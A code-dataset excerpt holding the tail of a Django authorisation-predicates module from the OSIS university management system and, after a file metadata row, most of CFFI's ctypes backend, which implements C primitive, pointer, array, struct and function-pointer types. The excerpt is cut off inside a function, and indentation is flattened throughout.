def are_all_minitrainings_removable(self, user, minitraining_root):
minitraining_roots = minitraining_root.group.groupyear_set.all().select_related(
'education_group_type',
'management_entity',
'academic_year'
)
return _are_all_removable(self, user, minitraining_roots, 'base.delete_minitraining')
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def are_all_groups_removable(self, user, group_year):
groups = group_year.group.groupyear_set.all().select_related(
'education_group_type', 'management_entity', 'academic_year'
)
return _are_all_removable(self, user, groups, 'base.delete_group')
def _are_all_removable(self, user, objects, perm):
# use shortcut break : at least one should not have perm to trigger error
result = all(
user.has_perm(perm, object)
for object in objects.order_by('academic_year__year')
)
# transfers last perm error message
message = get_permission_error(user, perm)
set_permission_error(user, self.context['perm_name'], message)
return result
@predicate(bind=True)
@predicate_failed_msg(
message=pgettext("male", "The user does not have permission to create a %(category)s.") %
{"category": Categories.GROUP.value}
)
def is_not_orphan_group(self, user, education_group_year=None):
return education_group_year is not None
# FIXME: Move to business logic because it's not a predicate (found in MinimumEditableYearValidator)
@predicate(bind=True)
@predicate_failed_msg(
message=_("You cannot change/delete a education group existing before %(limit_year)s") %
{"limit_year": settings.YEAR_LIMIT_EDG_MODIFICATION}
)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_education_group_year_older_or_equals_than_limit_settings_year(
self,
user: User,
obj: Union[EducationGroupYear, GroupYear] = None
):
if obj:
return obj.academic_year.year >= settings.YEAR_LIMIT_EDG_MODIFICATION
return None
@predicate(bind=True)
@predicate_failed_msg(message=_("The user is not allowed to create/modify this type of education group"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_user_attached_to_all_scopes(self, user: User, obj: GroupYear = None):
return any(Scope.ALL.name in role.scopes for role in self.context['role_qs'] if hasattr(role, 'scopes'))
@predicate(bind=True)
@predicate_failed_msg(message=_("The user is not allowed to create/modify this type of education group"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_education_group_type_authorized_according_to_user_scope(
self,
user: User,
obj: Union[EducationGroupYear, GroupYear] = None
):
if obj:
return any(
obj.education_group_type.name in role.get_allowed_education_group_types()
for role in self.context['role_qs']
if obj.management_entity_id in self.context['role_qs'].filter(pk=role.pk).get_entities_ids()
)
return None
@predicate(bind=True)
@predicate_failed_msg(message=_("The user is not attached to the management entity"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_user_attached_to_management_entity(
self,
user: User,
obj: Union[EducationGroupYear, GroupYear] = None
):
if obj:
user_entity_ids = self.context['role_qs'].get_entities_ids()
return obj.management_entity_id in user_entity_ids
return obj
# FIXME: Move to business logic because it's not a predicate
@predicate(bind=True)
@predicate_failed_msg(message=_("You must create the version of the concerned training and then attach that version"
" inside this version"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_element_only_inside_standard_program(
self,
user: User,
education_group_year: Union[EducationGroupYear, GroupYear] = None
):
from program_management.ddd.repositories import program_tree_version
if isinstance(education_group_year, GroupYear):
element_id = Element.objects.get(group_year=education_group_year).id
try:
from program_management.ddd.domain.service import identity_search
node_identity = identity_search.NodeIdentitySearch.get_from_element_id(element_id)
tree_version_identity = identity_search.ProgramTreeVersionIdentitySearch(
).get_from_node_identity(
node_identity
)
tree_version = tree_version_identity and program_tree_version.ProgramTreeVersionRepository(
).get(tree_version_identity)
if tree_version and not tree_version.is_official_standard:
return False
except (interface.BusinessException, exception.ProgramTreeVersionNotFoundException):
pass
from program_management.ddd.repositories import load_tree_version
tree_versions = load_tree_version.load_tree_versions_from_children([element_id])
return all((version.is_official_standard for version in tree_versions))
return education_group_year
@predicate(bind=True)
@predicate_failed_msg(message=_("This education group is not editable during this period."))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_program_edition_period_open(self, user, group_year: 'GroupYear' = None):
calendar = EducationGroupPreparationCalendar()
if group_year:
return calendar.is_target_year_authorized(target_year=group_year.academic_year.year)
return bool(calendar.get_target_years_opened())
@predicate(bind=True)
@predicate_failed_msg(message=_("This education group is not editable during this period."))
def have_one_program_edition_calendar_open(self, user, group_year: 'GroupYear' = None):
return is_program_edition_period_open(user, None)
@predicate(bind=True)
@predicate_failed_msg(message=_("This education group is not editable during this period."))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_education_group_extended_daily_management_calendar_open(self, user, group_year: 'GroupYear' = None):
calendar = EducationGroupExtendedDailyManagementCalendar()
if group_year:
return calendar.is_target_year_authorized(target_year=group_year.academic_year.year)
return bool(calendar.get_target_years_opened())
@predicate(bind=True)
@predicate_failed_msg(message=_("This education group is not editable during this period."))
def have_one_education_group_extended_daily_management_calendar_open(self, user, group_year: 'GroupYear' = None):
return is_education_group_extended_daily_management_calendar_open(user, None)
@predicate(bind=True)
@predicate_failed_msg(message=_("This education group is not editable during this period."))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_education_group_limited_daily_management_calendar_open(self, user, group_year: 'GroupYear' = None):
calendar = EducationGroupLimitedDailyManagementCalendar()
if group_year:
return calendar.is_target_year_authorized(target_year=group_year.academic_year.year)
return bool(calendar.get_target_years_opened())
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_continuing_education_group_year(self, user, obj: Union['GroupYear', 'EducationGroupYear'] = None):
return obj and obj.education_group_type.name in TrainingType.continuing_education_types()
@predicate(bind=True)
@predicate_failed_msg(message=_("The scope of the user is limited and prevents this action to be performed"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_user_linked_to_all_scopes_of_management_entity(self, user, obj: Union['GroupYear', 'EducationGroupYear']):
if obj:
user_scopes = {
entity_id: scope for role in self.context['role_qs']
for scope in role.scopes if hasattr(role, 'scopes')
for entity_id in self.context['role_qs'].filter(pk=role.pk).get_entities_ids()
}
return user_scopes.get(obj.management_entity_id) == Scope.ALL.value
return None
@predicate(bind=True)
@predicate_failed_msg(message=_("Transition version of finalities must be filled from transition version of master"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_education_group_type_eligible_to_be_filled(self, user, obj: Union['GroupYear', 'EducationGroupYear']):
if obj:
return obj.education_group_type.name not in TrainingType.finality_types()
return None
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_group_year_an_eligible_transition(
self,
user: User,
obj: GroupYear = None
):
if obj:
is_transition = obj and obj.partial_acronym.upper().startswith('T')
links_to_parent = obj.element.children_elements.all()
if links_to_parent:
parents = [link.parent_element.group_year for link in links_to_parent]
all_parents_transition = all(parent.partial_acronym.upper().startswith('T') for parent in parents)
return is_transition and all_parents_transition
return is_transition
return None
@predicate(bind=True)
@predicate_failed_msg(message=_("This education group is not editable in the past."))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_education_group_year_not_in_past(self, user, obj: Union['GroupYear', 'EducationGroupYear']):
if obj:
return obj.academic_year.year >= current_academic_year().year
return None
|
uclouvain/osis
|
education_group/auth/predicates.py
|
Python
|
agpl-3.0
| 12,243 | 0.003921 |
import ctypes, ctypes.util, operator, sys
from . import model
if sys.version_info < (3,):
bytechr = chr
else:
unicode = str
long = int
xrange = range
bytechr = lambda num: bytes([num])
class CTypesType(type):
pass
class CTypesData(object):
__metaclass__ = CTypesType
__slots__ = ['__weakref__']
__name__ = '<cdata>'
def __init__(self, *args):
raise TypeError("cannot instantiate %r" % (self.__class__,))
@classmethod
def _newp(cls, init):
raise TypeError("expected a pointer or array ctype, got '%s'"
% (cls._get_c_name(),))
@staticmethod
def _to_ctypes(value):
raise TypeError
@classmethod
def _arg_to_ctypes(cls, *value):
try:
ctype = cls._ctype
except AttributeError:
raise TypeError("cannot create an instance of %r" % (cls,))
if value:
res = cls._to_ctypes(*value)
if not isinstance(res, ctype):
res = cls._ctype(res)
else:
res = cls._ctype()
return res
@classmethod
def _create_ctype_obj(cls, init):
if init is None:
return cls._arg_to_ctypes()
else:
return cls._arg_to_ctypes(init)
@staticmethod
def _from_ctypes(ctypes_value):
raise TypeError
@classmethod
def _get_c_name(cls, replace_with=''):
return cls._reftypename.replace(' &', replace_with)
@classmethod
def _fix_class(cls):
cls.__name__ = 'CData<%s>' % (cls._get_c_name(),)
cls.__qualname__ = 'CData<%s>' % (cls._get_c_name(),)
cls.__module__ = 'ffi'
def _get_own_repr(self):
raise NotImplementedError
def _addr_repr(self, address):
if address == 0:
return 'NULL'
else:
if address < 0:
address += 1 << (8*ctypes.sizeof(ctypes.c_void_p))
return '0x%x' % address
def __repr__(self, c_name=None):
own = self._get_own_repr()
return '<cdata %r %s>' % (c_name or self._get_c_name(), own)
def _convert_to_address(self, BClass):
if BClass is None:
raise TypeError("cannot convert %r to an address" % (
self._get_c_name(),))
else:
raise TypeError("cannot convert %r to %r" % (
self._get_c_name(), BClass._get_c_name()))
@classmethod
def _get_size(cls):
return ctypes.sizeof(cls._ctype)
def _get_size_of_instance(self):
return ctypes.sizeof(self._ctype)
@classmethod
def _cast_from(cls, source):
raise TypeError("cannot cast to %r" % (cls._get_c_name(),))
def _cast_to_integer(self):
return self._convert_to_address(None)
@classmethod
def _alignment(cls):
return ctypes.alignment(cls._ctype)
def __iter__(self):
raise TypeError("cdata %r does not support iteration" % (
self._get_c_name()),)
def _make_cmp(name):
cmpfunc = getattr(operator, name)
def cmp(self, other):
v_is_ptr = not isinstance(self, CTypesGenericPrimitive)
w_is_ptr = (isinstance(other, CTypesData) and
not isinstance(other, CTypesGenericPrimitive))
if v_is_ptr and w_is_ptr:
return cmpfunc(self._convert_to_address(None),
other._convert_to_address(None))
elif v_is_ptr or w_is_ptr:
return NotImplemented
else:
if isinstance(self, CTypesGenericPrimitive):
self = self._value
if isinstance(other, CTypesGenericPrimitive):
other = other._value
return cmpfunc(self, other)
cmp.func_name = name
return cmp
__eq__ = _make_cmp('__eq__')
__ne__ = _make_cmp('__ne__')
__lt__ = _make_cmp('__lt__')
__le__ = _make_cmp('__le__')
__gt__ = _make_cmp('__gt__')
__ge__ = _make_cmp('__ge__')
def __hash__(self):
return hash(self._convert_to_address(None))
def _to_string(self, maxlen):
raise TypeError("string(): %r" % (self,))
class CTypesGenericPrimitive(CTypesData):
__slots__ = []
def __hash__(self):
return hash(self._value)
def _get_own_repr(self):
return repr(self._from_ctypes(self._value))
class CTypesGenericArray(CTypesData):
__slots__ = []
@classmethod
def _newp(cls, init):
return cls(init)
def __iter__(self):
for i in xrange(len(self)):
yield self[i]
def _get_own_repr(self):
return self._addr_repr(ctypes.addressof(self._blob))
class CTypesGenericPtr(CTypesData):
__slots__ = ['_address', '_as_ctype_ptr']
_automatic_casts = False
kind = "pointer"
@classmethod
def _newp(cls, init):
return cls(init)
@classmethod
def _cast_from(cls, source):
if source is None:
address = 0
elif isinstance(source, CTypesData):
address = source._cast_to_integer()
elif isinstance(source, (int, long)):
address = source
else:
raise TypeError("bad type for cast to %r: %r" %
(cls, type(source).__name__))
return cls._new_pointer_at(address)
@classmethod
def _new_pointer_at(cls, address):
self = cls.__new__(cls)
self._address = address
self._as_ctype_ptr = ctypes.cast(address, cls._ctype)
return self
def _get_own_repr(self):
try:
return self._addr_repr(self._address)
except AttributeError:
return '???'
def _cast_to_integer(self):
return self._address
def __nonzero__(self):
return bool(self._address)
__bool__ = __nonzero__
@classmethod
def _to_ctypes(cls, value):
if not isinstance(value, CTypesData):
raise TypeError("unexpected %s object" % type(value).__name__)
address = value._convert_to_address(cls)
return ctypes.cast(address, cls._ctype)
@classmethod
def _from_ctypes(cls, ctypes_ptr):
address = ctypes.cast(ctypes_ptr, ctypes.c_void_p).value or 0
return cls._new_pointer_at(address)
@classmethod
def _initialize(cls, ctypes_ptr, value):
if value:
ctypes_ptr.contents = cls._to_ctypes(value).contents
def _convert_to_address(self, BClass):
if (BClass in (self.__class__, None) or BClass._automatic_casts
or self._automatic_casts):
return self._address
else:
return CTypesData._convert_to_address(self, BClass)
class CTypesBaseStructOrUnion(CTypesData):
__slots__ = ['_blob']
@classmethod
def _create_ctype_obj(cls, init):
# may be overridden
raise TypeError("cannot instantiate opaque type %s" % (cls,))
def _get_own_repr(self):
return self._addr_repr(ctypes.addressof(self._blob))
@classmethod
def _offsetof(cls, fieldname):
return getattr(cls._ctype, fieldname).offset
def _convert_to_address(self, BClass):
if getattr(BClass, '_BItem', None) is self.__class__:
return ctypes.addressof(self._blob)
else:
return CTypesData._convert_to_address(self, BClass)
@classmethod
def _from_ctypes(cls, ctypes_struct_or_union):
self = cls.__new__(cls)
self._blob = ctypes_struct_or_union
return self
@classmethod
def _to_ctypes(cls, value):
return value._blob
def __repr__(self, c_name=None):
return CTypesData.__repr__(self, c_name or self._get_c_name(' &'))
class CTypesBackend(object):
PRIMITIVE_TYPES = {
'char': ctypes.c_char,
'short': ctypes.c_short,
'int': ctypes.c_int,
'long': ctypes.c_long,
'long long': ctypes.c_longlong,
'signed char': ctypes.c_byte,
'unsigned char': ctypes.c_ubyte,
'unsigned short': ctypes.c_ushort,
'unsigned int': ctypes.c_uint,
'unsigned long': ctypes.c_ulong,
'unsigned long long': ctypes.c_ulonglong,
'float': ctypes.c_float,
'double': ctypes.c_double,
'_Bool': ctypes.c_bool,
}
for _name in ['unsigned long long', 'unsigned long',
'unsigned int', 'unsigned short', 'unsigned char']:
_size = ctypes.sizeof(PRIMITIVE_TYPES[_name])
PRIMITIVE_TYPES['uint%d_t' % (8*_size)] = PRIMITIVE_TYPES[_name]
if _size == ctypes.sizeof(ctypes.c_void_p):
PRIMITIVE_TYPES['uintptr_t'] = PRIMITIVE_TYPES[_name]
if _size == ctypes.sizeof(ctypes.c_size_t):
PRIMITIVE_TYPES['size_t'] = PRIMITIVE_TYPES[_name]
for _name in ['long long', 'long', 'int', 'short', 'signed char']:
_size = ctypes.sizeof(PRIMITIVE_TYPES[_name])
PRIMITIVE_TYPES['int%d_t' % (8*_size)] = PRIMITIVE_TYPES[_name]
if _size == ctypes.sizeof(ctypes.c_void_p):
PRIMITIVE_TYPES['intptr_t'] = PRIMITIVE_TYPES[_name]
PRIMITIVE_TYPES['ptrdiff_t'] = PRIMITIVE_TYPES[_name]
if _size == ctypes.sizeof(ctypes.c_size_t):
PRIMITIVE_TYPES['ssize_t'] = PRIMITIVE_TYPES[_name]
def __init__(self):
self.RTLD_LAZY = 0 # not supported anyway by ctypes
self.RTLD_NOW = 0
self.RTLD_GLOBAL = ctypes.RTLD_GLOBAL
self.RTLD_LOCAL = ctypes.RTLD_LOCAL
def set_ffi(self, ffi):
self.ffi = ffi
def _get_types(self):
return CTypesData, CTypesType
def load_library(self, path, flags=0):
cdll = ctypes.CDLL(path, flags)
return CTypesLibrary(self, cdll)
def new_void_type(self):
class CTypesVoid(CTypesData):
__slots__ = []
_reftypename = 'void &'
@staticmethod
def _from_ctypes(novalue):
return None
@staticmethod
def _to_ctypes(novalue):
if novalue is not None:
raise TypeError("None expected, got %s object" %
(type(novalue).__name__,))
return None
CTypesVoid._fix_class()
return CTypesVoid
def new_primitive_type(self, name):
if name == 'wchar_t':
raise NotImplementedError(name)
ctype = self.PRIMITIVE_TYPES[name]
if name == 'char':
kind = 'char'
elif name in ('float', 'double'):
kind = 'float'
else:
if name in ('signed char', 'unsigned char'):
kind = 'byte'
elif name == '_Bool':
kind = 'bool'
else:
kind = 'int'
is_signed = (ctype(-1).value == -1)
#
def _cast_source_to_int(source):
if isinstance(source, (int, long, float)):
source = int(source)
elif isinstance(source, CTypesData):
source = source._cast_to_integer()
elif isinstance(source, bytes):
source = ord(source)
elif source is None:
source = 0
else:
raise TypeError("bad type for cast to %r: %r" %
(CTypesPrimitive, type(source).__name__))
return source
#
kind1 = kind
class CTypesPrimitive(CTypesGenericPrimitive):
__slots__ = ['_value']
_ctype = ctype
_reftypename = '%s &' % name
kind = kind1
def __init__(self, value):
self._value = value
@staticmethod
def _create_ctype_obj(init):
if init is None:
return ctype()
return ctype(CTypesPrimitive._to_ctypes(init))
if kind == 'int' or kind == 'byte':
@classmethod
def _cast_from(cls, source):
source = _cast_source_to_int(source)
source = ctype(source).value # cast within range
return cls(source)
def __int__(self):
return self._value
if kind == 'bool':
@classmethod
def _cast_from(cls, source):
if not isinstance(source, (int, long, float)):
source = _cast_source_to_int(source)
return cls(bool(source))
def __int__(self):
return self._value
if kind == 'char':
@classmethod
def _cast_from(cls, source):
source = _cast_source_to_int(source)
source = bytechr(source & 0xFF)
return cls(source)
def __int__(self):
return ord(self._value)
if kind == 'float':
@classmethod
def _cast_from(cls, source):
if isinstance(source, float):
pass
elif isinstance(source, CTypesGenericPrimitive):
if hasattr(source, '__float__'):
source = float(source)
else:
source = int(source)
else:
source = _cast_source_to_int(source)
source = ctype(source).value # fix precision
return cls(source)
def __int__(self):
return int(self._value)
def __float__(self):
return self._value
_cast_to_integer = __int__
if kind == 'int' or kind == 'byte' or kind == 'bool':
@staticmethod
def _to_ctypes(x):
if not isinstance(x, (int, long)):
if isinstance(x, CTypesData):
x = int(x)
else:
raise TypeError("integer expected, got %s" %
type(x).__name__)
if ctype(x).value != x:
if not is_signed and x < 0:
raise OverflowError("%s: negative integer" % name)
else:
raise OverflowError("%s: integer out of bounds"
% name)
return x
if kind == 'char':
@staticmethod
def _to_ctypes(x):
if isinstance(x, bytes) and len(x) == 1:
return x
if isinstance(x, CTypesPrimitive): # <CData <char>>
return x._value
raise TypeError("character expected, got %s" %
type(x).__name__)
def __nonzero__(self):
return ord(self._value) != 0
else:
def __nonzero__(self):
return self._value != 0
__bool__ = __nonzero__
if kind == 'float':
@staticmethod
def _to_ctypes(x):
if not isinstance(x, (int, long, float, CTypesData)):
raise TypeError("float expected, got %s" %
type(x).__name__)
return ctype(x).value
@staticmethod
def _from_ctypes(value):
return getattr(value, 'value', value)
@staticmethod
def _initialize(blob, init):
blob.value = CTypesPrimitive._to_ctypes(init)
if kind == 'char':
def _to_string(self, maxlen):
return self._value
if kind == 'byte':
def _to_string(self, maxlen):
return chr(self._value & 0xff)
#
CTypesPrimitive._fix_class()
return CTypesPrimitive
def new_pointer_type(self, BItem):
getbtype = self.ffi._get_cached_btype
if BItem is getbtype(model.PrimitiveType('char')):
kind = 'charp'
elif BItem in (getbtype(model.PrimitiveType('signed char')),
getbtype(model.PrimitiveType('unsigned char'))):
kind = 'bytep'
elif BItem is getbtype(model.void_type):
kind = 'voidp'
else:
kind = 'generic'
#
class CTypesPtr(CTypesGenericPtr):
__slots__ = ['_own']
if kind == 'charp':
__slots__ += ['__as_strbuf']
_BItem = BItem
if hasattr(BItem, '_ctype'):
_ctype = ctypes.POINTER(BItem._ctype)
_bitem_size = ctypes.sizeof(BItem._ctype)
else:
_ctype = ctypes.c_void_p
if issubclass(BItem, CTypesGenericArray):
_reftypename = BItem._get_c_name('(* &)')
else:
_reftypename = BItem._get_c_name(' * &')
def __init__(self, init):
ctypeobj = BItem._create_ctype_obj(init)
if kind == 'charp':
self.__as_strbuf = ctypes.create_string_buffer(
ctypeobj.value + b'\x00')
self._as_ctype_ptr = ctypes.cast(
self.__as_strbuf, self._ctype)
else:
self._as_ctype_ptr = ctypes.pointer(ctypeobj)
self._address = ctypes.cast(self._as_ctype_ptr,
ctypes.c_void_p).value
self._own = True
def __add__(self, other):
if isinstance(other, (int, long)):
return self._new_pointer_at(self._address +
other * self._bitem_size)
else:
return NotImplemented
def __sub__(self, other):
if isinstance(other, (int, long)):
return self._new_pointer_at(self._address -
other * self._bitem_size)
elif type(self) is type(other):
return (self._address - other._address) // self._bitem_size
else:
return NotImplemented
def __getitem__(self, index):
if getattr(self, '_own', False) and index != 0:
raise IndexError
return BItem._from_ctypes(self._as_ctype_ptr[index])
def __setitem__(self, index, value):
self._as_ctype_ptr[index] = BItem._to_ctypes(value)
if kind == 'charp' or kind == 'voidp':
@classmethod
def _arg_to_ctypes(cls, *value):
if value and isinstance(value[0], bytes):
return ctypes.c_char_p(value[0])
else:
return super(CTypesPtr, cls)._arg_to_ctypes(*value)
if kind == 'charp' or kind == 'bytep':
def _to_string(self, maxlen):
if maxlen < 0:
maxlen = sys.maxsize
p = ctypes.cast(self._as_ctype_ptr,
ctypes.POINTER(ctypes.c_char))
n = 0
while n < maxlen and p[n] != b'\x00':
n += 1
return b''.join([p[i] for i in range(n)])
def _get_own_repr(self):
if getattr(self, '_own', False):
return 'owning %d bytes' % (
ctypes.sizeof(self._as_ctype_ptr.contents),)
return super(CTypesPtr, self)._get_own_repr()
#
if (BItem is self.ffi._get_cached_btype(model.void_type) or
BItem is self.ffi._get_cached_btype(model.PrimitiveType('char'))):
CTypesPtr._automatic_casts = True
#
CTypesPtr._fix_class()
return CTypesPtr
def new_array_type(self, CTypesPtr, length):
if length is None:
brackets = ' &[]'
else:
brackets = ' &[%d]' % length
BItem = CTypesPtr._BItem
getbtype = self.ffi._get_cached_btype
if BItem is getbtype(model.PrimitiveType('char')):
kind = 'char'
elif BItem in (getbtype(model.PrimitiveType('signed char')),
getbtype(model.PrimitiveType('unsigned char'))):
kind = 'byte'
else:
kind = 'generic'
#
class CTypesArray(CTypesGenericArray):
__slots__ = ['_blob', '_own']
if length is not None:
_ctype = BItem._ctype * length
else:
__slots__.append('_ctype')
_reftypename = BItem._get_c_name(brackets)
_declared_length = length
_CTPtr = CTypesPtr
def __init__(self, init):
if length is None:
if isinstance(init, (int, long)):
len1 = init
init = None
elif kind == 'char' and isinstance(init, bytes):
len1 = len(init) + 1 # extra null
else:
init = tuple(init)
len1 = len(init)
self._ctype = BItem._ctype * len1
self._blob = self._ctype()
self._own = True
if init is not None:
self._initialize(self._blob, init)
@staticmethod
def _initialize(blob, init):
if isinstance(init, bytes):
init = [init[i:i+1] for i in range(len(init))]
else:
init = tuple(init)
if len(init) > len(blob):
raise IndexError("too many initializers")
addr = ctypes.cast(blob, ctypes.c_void_p).value
PTR = ctypes.POINTER(BItem._ctype)
itemsize = ctypes.sizeof(BItem._ctype)
for i, value in enumerate(init):
p = ctypes.cast(addr + i * itemsize, PTR)
BItem._initialize(p.contents, value)
def __len__(self):
return len(self._blob)
def __getitem__(self, index):
if not (0 <= index < len(self._blob)):
raise IndexError
return BItem._from_ctypes(self._blob[index])
def __setitem__(self, index, value):
if not (0 <= index < len(self._blob)):
raise IndexError
self._blob[index] = BItem._to_ctypes(value)
if kind == 'char' or kind == 'byte':
def _to_string(self, maxlen):
if maxlen < 0:
maxlen = len(self._blob)
p = ctypes.cast(self._blob,
ctypes.POINTER(ctypes.c_char))
n = 0
while n < maxlen and p[n] != b'\x00':
n += 1
return b''.join([p[i] for i in range(n)])
def _get_own_repr(self):
if getattr(self, '_own', False):
return 'owning %d bytes' % (ctypes.sizeof(self._blob),)
return super(CTypesArray, self)._get_own_repr()
def _convert_to_address(self, BClass):
if BClass in (CTypesPtr, None) or BClass._automatic_casts:
return ctypes.addressof(self._blob)
else:
return CTypesData._convert_to_address(self, BClass)
@staticmethod
def _from_ctypes(ctypes_array):
self = CTypesArray.__new__(CTypesArray)
self._blob = ctypes_array
return self
@staticmethod
def _arg_to_ctypes(value):
return CTypesPtr._arg_to_ctypes(value)
def __add__(self, other):
if isinstance(other, (int, long)):
return CTypesPtr._new_pointer_at(
ctypes.addressof(self._blob) +
other * ctypes.sizeof(BItem._ctype))
else:
return NotImplemented
@classmethod
def _cast_from(cls, source):
raise NotImplementedError("casting to %r" % (
cls._get_c_name(),))
#
CTypesArray._fix_class()
return CTypesArray
def _new_struct_or_union(self, kind, name, base_ctypes_class):
#
class struct_or_union(base_ctypes_class):
pass
struct_or_union.__name__ = '%s_%s' % (kind, name)
kind1 = kind
#
class CTypesStructOrUnion(CTypesBaseStructOrUnion):
__slots__ = ['_blob']
_ctype = struct_or_union
_reftypename = '%s &' % (name,)
_kind = kind = kind1
#
CTypesStructOrUnion._fix_class()
return CTypesStructOrUnion
def new_struct_type(self, name):
return self._new_struct_or_union('struct', name, ctypes.Structure)
def new_union_type(self, name):
return self._new_struct_or_union('union', name, ctypes.Union)
def complete_struct_or_union(self, CTypesStructOrUnion, fields, tp,
totalsize=-1, totalalignment=-1, sflags=0):
if totalsize >= 0 or totalalignment >= 0:
raise NotImplementedError("the ctypes backend of CFFI does not support "
"structures completed by verify(); please "
"compile and install the _cffi_backend module.")
struct_or_union = CTypesStructOrUnion._ctype
fnames = [fname for (fname, BField, bitsize) in fields]
btypes = [BField for (fname, BField, bitsize) in fields]
bitfields = [bitsize for (fname, BField, bitsize) in fields]
#
bfield_types = {}
cfields = []
for (fname, BField, bitsize) in fields:
if bitsize < 0:
cfields.append((fname, BField._ctype))
bfield_types[fname] = BField
else:
cfields.append((fname, BField._ctype, bitsize))
bfield_types[fname] = Ellipsis
if sflags & 8:
struct_or_union._pack_ = 1
struct_or_union._fields_ = cfields
CTypesStructOrUnion._bfield_types = bfield_types
#
@staticmethod
def _create_ctype_obj(init):
result = struct_or_union()
if init is not None:
initialize(result, init)
return result
CTypesStructOrUnion._create_ctype_obj = _create_ctype_obj
#
def initialize(blob, init):
if is_union:
if len(init) > 1:
raise ValueError("union initializer: %d items given, but "
"only one supported (use a dict if needed)"
% (len(init),))
if not isinstance(init, dict):
if isinstance(init, (bytes, unicode)):
raise TypeError("union initializer: got a str")
init = tuple(init)
if len(init) > len(fnames):
raise ValueError("too many values for %s initializer" %
CTypesStructOrUnion._get_c_name())
init = dict(zip(fnames, init))
addr = ctypes.addressof(blob)
for fname, value in init.items():
BField, bitsize = name2fieldtype[fname]
assert bitsize < 0, \
"not implemented: initializer with bit fields"
offset = CTypesStructOrUnion._offsetof(fname)
PTR = ctypes.POINTER(BField._ctype)
p = ctypes.cast(addr + offset, PTR)
BField._initialize(p.contents, value)
is_union = CTypesStructOrUnion._kind == 'union'
name2fieldtype = dict(zip(fnames, zip(btypes, bitfields)))
#
for fname, BField, bitsize in fields:
if fname == '':
raise NotImplementedError("nested anonymous structs/unions")
if hasattr(CTypesStructOrUnion, fname):
raise ValueError("the field name %r conflicts in "
"the ctypes backend" % fname)
if bitsize < 0:
def getter(self, fname=fname, BField=BField,
offset=CTypesStructOrUnion._offsetof(fname),
PTR=ctypes.POINTER(BField._ctype)):
addr = ctypes.addressof(self._blob)
p = ctypes.cast(addr + offset, PTR)
return BField._from_ctypes(p.contents)
def setter(self, value, fname=fname, BField=BField):
setattr(self._blob, fname, BField._to_ctypes(value))
#
if issubclass(BField, CTypesGenericArray):
setter = None
if BField._declared_length == 0:
def getter(self, fname=fname, BFieldPtr=BField._CTPtr,
offset=CTypesStructOrUnion._offsetof(fname),
PTR=ctypes.POINTER(BField._ctype)):
addr = ctypes.addressof(self._blob)
p = ctypes.cast(addr + offset, PTR)
return BFieldPtr._from_ctypes(p)
#
else:
def getter(self, fname=fname, BField=BField):
return BField._from_ctypes(getattr(self._blob, fname))
def setter(self, value, fname=fname, BField=BField):
# xxx obscure workaround
value = BField._to_ctypes(value)
oldvalue = getattr(self._blob, fname)
setattr(self._blob, fname, value)
if value != getattr(self._blob, fname):
setattr(self._blob, fname, oldvalue)
raise OverflowError("value too large for bitfield")
setattr(CTypesStructOrUnion, fname, property(getter, setter))
#
CTypesPtr = self.ffi._get_cached_btype(model.PointerType(tp))
for fname in fnames:
if hasattr(CTypesPtr, fname):
raise ValueError("the field name %r conflicts in "
"the ctypes backend" % fname)
def getter(self, fname=fname):
return getattr(self[0], fname)
def setter(self, value, fname=fname):
setattr(self[0], fname, value)
setattr(CTypesPtr, fname, property(getter, setter))
def new_function_type(self, BArgs, BResult, has_varargs):
nameargs = [BArg._get_c_name() for BArg in BArgs]
if has_varargs:
nameargs.append('...')
nameargs = ', '.join(nameargs)
#
class CTypesFunctionPtr(CTypesGenericPtr):
__slots__ = ['_own_callback', '_name']
_ctype = ctypes.CFUNCTYPE(getattr(BResult, '_ctype', None),
*[BArg._ctype for BArg in BArgs],
use_errno=True)
_reftypename = BResult._get_c_name('(* &)(%s)' % (nameargs,))
def __init__(self, init, error=None):
# create a callback to the Python callable init()
import traceback
assert not has_varargs, "varargs not supported for callbacks"
if getattr(BResult, '_ctype', None) is not None:
error = BResult._from_ctypes(
BResult._create_ctype_obj(error))
else:
error = None
def callback(*args):
args2 = []
for arg, BArg in zip(args, BArgs):
args2.append(BArg._from_ctypes(arg))
try:
res2 = init(*args2)
res2 = BResult._to_ctypes(res2)
except:
traceback.print_exc()
res2 = error
if issubclass(BResult, CTypesGenericPtr):
if res2:
res2 = ctypes.cast(res2, ctypes.c_void_p).value
# .value: http://bugs.python.org/issue1574593
else:
res2 = None
#print repr(res2)
return res2
if issubclass(BResult, CTypesGenericPtr):
# The only pointers callbacks can return are void*s:
# http://bugs.python.org/issue5710
callback_ctype = ctypes.CFUNCTYPE(
ctypes.c_void_p,
*[BArg._ctype for BArg in BArgs],
use_errno=True)
else:
callback_ctype = CTypesFunctionPtr._ctype
self._as_ctype_ptr = callback_ctype(callback)
self._address = ctypes.cast(self._as_ctype_ptr,
ctypes.c_void_p).value
self._own_callback = init
@staticmethod
def _initialize(ctypes_ptr, value):
if value:
raise NotImplementedError("ctypes backend: not supported: "
"initializers for function pointers")
def __repr__(self):
c_name = getattr(self, '_name', None)
if c_name:
i = self._reftypename.index('(* &)')
if self._reftypename[i-1] not in ' )*':
c_name = ' ' + c_name
c_name = self._reftypename.replace('(* &)', c_name)
return CTypesData.__repr__(self, c_name)
def _get_own_repr(self):
if getattr(self, '_own_callback', None) is not None:
return 'calling %r' % (self._own_callback,)
return super(CTypesFunctionPtr, self)._get_own_repr()
def __call__(self, *args):
if has_varargs:
assert len(args) >= len(BArgs)
extraargs = args[len(BArgs):]
args = args[:len(BArgs)]
